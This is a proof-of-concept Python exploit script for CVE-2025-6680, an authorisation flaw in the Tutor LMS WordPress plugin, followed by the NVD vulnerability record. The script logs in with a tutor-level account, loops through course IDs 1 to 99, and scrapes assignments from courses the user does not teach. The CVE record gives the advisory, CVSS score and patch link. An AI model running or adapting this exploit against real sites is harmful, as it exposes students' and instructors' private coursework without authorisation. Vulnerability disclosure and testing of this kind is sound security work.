CVE-2025-6680

# CVE-2025-6680 PoC - Tutor LMS Sensitive Information Exposure # Authenticated tutor-level users can view assignments from courses they don't teach import requests import sys from bs4 import BeautifulSoup TARGET_URL = "https://vulnerable-site.com" USERNAME = "attacker_tutor" PASSWORD = "password123" def login(session, username, password): """Login to WordPress with tutor-level account""" login_url = f"{TARGET_URL}/wp-login.php" data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f"{TARGET_URL}/wp-admin/", 'testcookie': '1' } response = session.post(login_url, data=data, verify=False) return 'wordpress_logged_in' in session.cookies.get_dict() def exploit_sensitive_info(session, target_course_id): """Exploit CVE-2025-6680 to view assignments from other courses""" # The vulnerable endpoint allows viewing assignments for any course # without proper authorization check assignments_url = f"{TARGET_URL}/wp-admin/admin.php?page=tutor_assignments" params = { 'course_id': target_course_id, # Target course not owned by attacker 'view': 'review' } response = session.get(assignments_url, params=params, verify=False) if response.status_code == 200: soup = BeautifulSoup(response.text, 'html.parser') # Extract assignment data assignments = soup.find_all('div', class_='tutor-assignment-item') print(f"[+] Found {len(assignments)} assignments in course {target_course_id}") return assignments return [] def main(): session = requests.Session() print("[*] Logging in as tutor-level user...") if not login(session, USERNAME, PASSWORD): print("[-] Login failed!") sys.exit(1) print("[+] Login successful!") # List of course IDs to probe (enumerate through course IDs) for course_id in range(1, 100): print(f"[*] Checking course ID: {course_id}") assignments = exploit_sensitive_info(session, course_id) if assignments: print(f"[!] Sensitive information exposed for course {course_id}") print("[*] PoC execution completed") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-6680", "sourceIdentifier": "[email protected]", "published": "2025-10-25T06:15:36.563", "lastModified": "2025-12-05T00:23:55.297", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.8.3. This makes it possible for authenticated attackers, with tutor-level access and above, to view assignments for courses they don't teach which may contain sensitive information."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:themeum:tutor_lms:*:*:*:*:free:wordpress:*:*", "versionEndExcluding": "3.9.0", "matchCriteriaId": "D66EBFF5-F51F-4A4E-85F5-321FAB6AD260"}]}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3382577/tutor/trunk/templates/dashboard/assignments/review.php?old=3249440&old_path=tutor%2Ftrunk%2Ftemplates%2Fdashboard%2Fassignments%2Freview.php", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1b8d88e4-a9dc-4740-b836-99f730beefcb?source=cve", "source": "[email protected]", "tags": ["Product", "Third Party Advisory"]}]}}